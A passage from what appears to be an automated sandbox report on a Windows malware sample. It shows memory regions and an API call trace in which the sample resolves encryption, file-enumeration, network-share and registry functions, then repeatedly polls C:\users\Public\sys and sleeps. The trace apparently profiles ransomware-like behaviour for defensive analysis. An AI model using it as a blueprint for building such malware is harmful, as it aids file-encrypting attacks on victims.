S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14724 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14725 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14726 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14727 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14728 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14729 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14730 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 14731 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 14732 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 14733 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 14734 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 14735 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14736 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 14737 start_va = 0x3b0000 end_va = 0x537fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 14738 start_va = 0x540000 end_va = 0x6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 14739 start_va = 0x6d0000 end_va = 0x1acffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 14740 start_va = 0x1ad0000 end_va = 0x1ec2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ad0000" filename = "" Region: id = 14741 start_va = 0x1ed0000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 14742 start_va = 0x1fd0000 end_va = 0x204ffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 14743 start_va = 0x2060000 end_va = 0x20dffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 14744 start_va = 0x20e0000 end_va = 0x215ffff entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 14745 start_va = 0x2210000 end_va = 0x228ffff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 14746 start_va = 0x2290000 end_va = 0x255efff entry_point = 0x2290000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14747 start_va = 0x2700000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 14748 start_va = 0x2840000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 14749 start_va = 0x28c0000 end_va = 0x299efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 14750 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14751 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14752 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14753 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14754 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14755 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14756 start_va = 0xffcf0000 end_va = 0xffd63fff entry_point = 0xffcf0000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 14757 start_va = 0x13f0e0000 end_va = 0x13f113fff entry_point = 0x0 region_type = private name = "private_0x000000013f0e0000" filename = "" Region: id = 14758 start_va = 0x7fef7bb0000 end_va = 0x7fef7bb8fff entry_point = 0x7fef7bb0000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 14759 start_va = 0x7fefab80000 end_va = 0x7fefab89fff entry_point = 0x7fefab80000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 14760 start_va = 0x7fefbaa0000 end_va = 0x7fefbad4fff entry_point = 0x7fefbaa0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 14761 start_va = 0x7fefbae0000 end_va = 0x7fefbaf7fff entry_point = 0x7fefbae0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 14762 start_va = 0x7fefbf10000 end_va = 0x7fefbf65fff entry_point = 0x7fefbf10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 14763 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14764 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 14765 start_va = 0x7fefd0e0000 end_va = 0x7fefd14cfff entry_point = 0x7fefd0e0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 14766 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 14767 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 14768 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 14769 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14770 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14771 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 14772 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14773 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14774 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 14775 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 14776 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14777 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14778 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14779 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 14780 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14781 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14782 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14783 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14784 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 14785 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14786 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 14787 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 14788 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 14789 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 14790 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14797 start_va = 0x27b0000 end_va = 0x282ffff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 14798 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 14799 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 14800 start_va = 0x7fefe360000 end_va = 0x7feff0e7fff entry_point = 0x7fefe360000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 14801 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 14802 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14803 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Thread: id = 1014 os_tid = 0x894 Thread: id = 1015 os_tid = 0x6ec Thread: id = 1016 os_tid = 0x5f4 Thread: id = 1017 os_tid = 0x5b4 Thread: id = 1018 os_tid = 0x5a8 Thread: id = 1019 os_tid = 0x5a0 Thread: id = 1020 os_tid = 0x1304 [0126.164] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77550000 [0126.164] GetProcAddress (hModule=0x77550000, lpProcName="LoadLibraryA") returned 0x77567070 [0126.164] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x7fefaaa0000 [0126.165] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x7feff740000 [0126.166] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x7fefddf0000 [0126.166] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7fefe360000 [0126.168] LoadLibraryA (lpLibFileName="Iphlpapi.dll") returned 0x7fefaf60000 [0126.170] GetProcAddress (hModule=0x77550000, lpProcName="GetLastError") returned 0x77572dd0 [0126.170] GetProcAddress (hModule=0x77550000, lpProcName="VirtualFree") returned 0x77561260 [0126.170] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptExportKey") returned 0x7feff748140 [0126.171] GetProcAddress (hModule=0x77550000, lpProcName="DeleteFileW") returned 0x7755ad90 [0126.171] GetProcAddress (hModule=0x77550000, lpProcName="GetDriveTypeW") returned 0x7756bdf0 [0126.171] GetProcAddress (hModule=0x77550000, lpProcName="GetCommandLineW") returned 0x7756c480 [0126.171] GetProcAddress (hModule=0x77550000, lpProcName="GetStartupInfoW") returned 0x77568070 [0126.171] GetProcAddress (hModule=0x77550000, lpProcName="FindNextFileW") returned 0x77561910 [0126.171] GetProcAddress (hModule=0x77550000, lpProcName="VirtualAlloc") returned 0x775667a0 [0126.171] GetProcAddress (hModule=0x7feff740000, lpProcName="GetUserNameA") returned 0x7feff74dc20 [0126.171] GetProcAddress (hModule=0x77550000, lpProcName="ExitProcess") returned 0x776940f0 [0126.171] GetProcAddress (hModule=0x77550000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x7759bb30 [0126.171] GetProcAddress (hModule=0x77550000, lpProcName="CreateProcessA") returned 0x775e8840 [0126.171] GetProcAddress (hModule=0x7fefaf60000, lpProcName="GetIpNetTable") returned 0x7fefaf6e558 [0126.197] GetProcAddress (hModule=0x77550000, lpProcName="GetVersionExW") returned 0x7755d910 [0126.197] GetProcAddress (hModule=0x77550000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x7759bb40 [0126.197] GetProcAddress (hModule=0x77550000, lpProcName="GetSystemDefaultLangID") returned 0x775594e0 [0126.197] GetProcAddress (hModule=0x7feff740000, lpProcName="GetUserNameW") returned 0x7feff751fd0 [0126.197] GetProcAddress (hModule=0x77550000, lpProcName="ReadFile") returned 0x77561500 [0126.198] GetProcAddress (hModule=0x7feff740000, lpProcName="RegQueryValueExA") returned 0x7feff75c480 [0126.198] GetProcAddress (hModule=0x77550000, lpProcName="CloseHandle") returned 0x77572f80 [0126.198] GetProcAddress (hModule=0x7feff740000, lpProcName="RegSetValueExW") returned 0x7feff751ed0 [0126.198] GetProcAddress (hModule=0x7feff740000, lpProcName="RegCloseKey") returned 0x7feff760710 [0126.198] GetProcAddress (hModule=0x77550000, lpProcName="CopyFileA") returned 0x775e5620 [0126.198] GetProcAddress (hModule=0x77550000, lpProcName="SetFileAttributesW") returned 0x775637a0 [0126.198] GetProcAddress (hModule=0x77550000, lpProcName="WinExec") returned 0x775e8d80 [0126.198] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptDeriveKey") returned 0x7feff77b6b0 [0126.198] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptGenKey") returned 0x7feff7419bc [0126.198] GetProcAddress (hModule=0x77550000, lpProcName="Sleep") returned 0x77572b70 [0126.198] GetProcAddress (hModule=0x77550000, lpProcName="GetCurrentProcess") returned 0x77565cf0 [0126.198] GetProcAddress (hModule=0x7fefe360000, lpProcName="ShellExecuteW") returned 0x7fefe37983c [0126.199] GetProcAddress (hModule=0x77550000, lpProcName="GetFileSize") returned 0x7755f9d0 [0126.199] GetProcAddress (hModule=0x77550000, lpProcName="GlobalAlloc") returned 0x775580c0 [0126.199] GetProcAddress (hModule=0x77550000, lpProcName="FindClose") returned 0x7756bd60 [0126.199] GetProcAddress (hModule=0x77550000, lpProcName="WaitForMultipleObjects") returned 0x77561170 [0126.199] GetProcAddress (hModule=0x77550000, lpProcName="GetModuleFileNameA") returned 0x775664a0 [0126.199] GetProcAddress (hModule=0x7fefe360000, lpProcName="ShellExecuteA") returned 0x7fefe5bec80 [0126.199] GetProcAddress (hModule=0x77550000, lpProcName="GetModuleHandleA") returned 0x775665e0 [0126.199] GetProcAddress (hModule=0x77550000, lpProcName="GetModuleFileNameW") returned 0x77567700 [0126.199] GetProcAddress (hModule=0x77550000, lpProcName="CreateFileA") returned 0x775731f0 [0126.199] GetProcAddress (hModule=0x77550000, lpProcName="GetFileSizeEx") returned 0x77559b30 [0126.200] GetProcAddress (hModule=0x77550000, lpProcName="WriteFile") returned 0x775735a0 [0126.200] GetProcAddress (hModule=0x77550000, lpProcName="GetLogicalDrives") returned 0x7755b930 [0126.200] GetProcAddress (hModule=0x7fefaaa0000, lpProcName="WNetEnumResourceW") returned 0x7fefaaa41a0 [0126.200] GetProcAddress (hModule=0x7feff740000, lpProcName="RegOpenKeyExW") returned 0x7feff7606f0 [0126.200] GetProcAddress (hModule=0x7fefaaa0000, lpProcName="WNetCloseEnum") returned 0x7fefaaa42dc [0126.200] GetProcAddress (hModule=0x77550000, lpProcName="GetWindowsDirectoryW") returned 0x775582b0 [0126.200] GetProcAddress (hModule=0x77550000, lpProcName="SetFileAttributesA") returned 0x77552d50 [0126.200] GetProcAddress (hModule=0x7feff740000, lpProcName="RegOpenKeyExA") returned 0x7feff75b5f0 [0126.200] GetProcAddress (hModule=0x77550000, lpProcName="SetFilePointer") returned 0x77561150 [0126.200] GetProcAddress (hModule=0x77550000, lpProcName="GetTickCount") returned 0x77572b00 [0126.200] GetProcAddress (hModule=0x77550000, lpProcName="GetFileAttributesW") returned 0x7756bdd0 [0126.201] GetProcAddress (hModule=0x77550000, lpProcName="FindFirstFileW") returned 0x7756bd80 [0126.201] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptAcquireContextW") returned 0x7feff74d98c [0126.201] GetProcAddress (hModule=0x77550000, lpProcName="MoveFileExW") returned 0x77553060 [0126.201] GetProcAddress (hModule=0x7fefaaa0000, lpProcName="WNetOpenEnumW") returned 0x7fefaaa3e00 [0126.201] GetProcAddress (hModule=0x7fefddf0000, lpProcName="CoInitialize") returned 0x7fefde0a51c [0126.201] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptDecrypt") returned 0x7feff77b6d0 [0126.201] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptImportKey") returned 0x7feff74af6c [0126.201] GetProcAddress (hModule=0x77550000, lpProcName="SetFilePointerEx") returned 0x7755af00 [0126.201] GetProcAddress (hModule=0x77550000, lpProcName="CopyFileW") returned 0x775592d0 [0126.201] GetProcAddress (hModule=0x77550000, lpProcName="FreeLibrary") returned 0x77566620 [0126.201] GetProcAddress (hModule=0x77550000, lpProcName="CreateProcessW") returned 0x77571bb0 [0126.202] GetProcAddress (hModule=0x77550000, lpProcName="CreateDirectoryW") returned 0x7755ad70 [0126.202] GetProcAddress (hModule=0x77550000, lpProcName="CreateThread") returned 0x77566580 [0126.202] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptDestroyKey") returned 0x7feff74afa0 [0126.202] GetProcAddress (hModule=0x7fefddf0000, lpProcName="CoCreateInstance") returned 0x7fefde17490 [0126.202] GetProcAddress (hModule=0x77550000, lpProcName="CreateFileW") returned 0x77561870 [0126.202] GetProcAddress (hModule=0x77550000, lpProcName="GetFileAttributesA") returned 0x775613e0 [0126.202] GetProcAddress (hModule=0x7feff740000, lpProcName="CryptEncrypt") returned 0x7feff77b650 [0126.202] GetProcAddress (hModule=0x7feff740000, lpProcName="RegDeleteValueW") returned 0x7feff74bbb0 [0126.202] GetVersionExW (in: lpVersionInformation=0x282f640*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x282f640*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0126.202] GetWindowsDirectoryW (in: lpBuffer=0x282f6f0, uSize=0x32 | out: lpBuffer="C:\\Windows") returned 0xa [0126.202] SetLastError (dwErrCode=0x0) [0126.202] CreateFileW (lpFileName="C:\\users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0xffffffffffffffff [0126.203] GetLastError () returned 0x20 [0126.203] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0126.203] Sleep (dwMilliseconds=0x1388) [0131.210] Sleep (dwMilliseconds=0x2328) [0140.261] GetWindowsDirectoryW (in: lpBuffer=0x282f6f0, uSize=0x32 | out: lpBuffer="C:\\Windows") returned 0xa [0140.261] SetLastError (dwErrCode=0x0) [0140.261] CreateFileW (lpFileName="C:\\users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0xffffffffffffffff [0140.261] GetLastError () returned 0x20 [0140.261] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0140.261] Sleep (dwMilliseconds=0x2328) [0149.795] GetWindowsDirectoryW (in: lpBuffer=0x282f6f0, uSize=0x32 | out: lpBuffer="C:\\Windows") returned 0xa [0149.795] SetLastError (dwErrCode=0x0) [0149.795] CreateFileW (lpFileName="C:\\users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2, hTemplateFile=0x0) returned 0xffffffffffffffff [0149.795] GetLastError () returned 0x20 [0149.795] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0149.795] Sleep (dwMilliseconds=0x2328) Thread: id = 1023 os_tid = 0x1178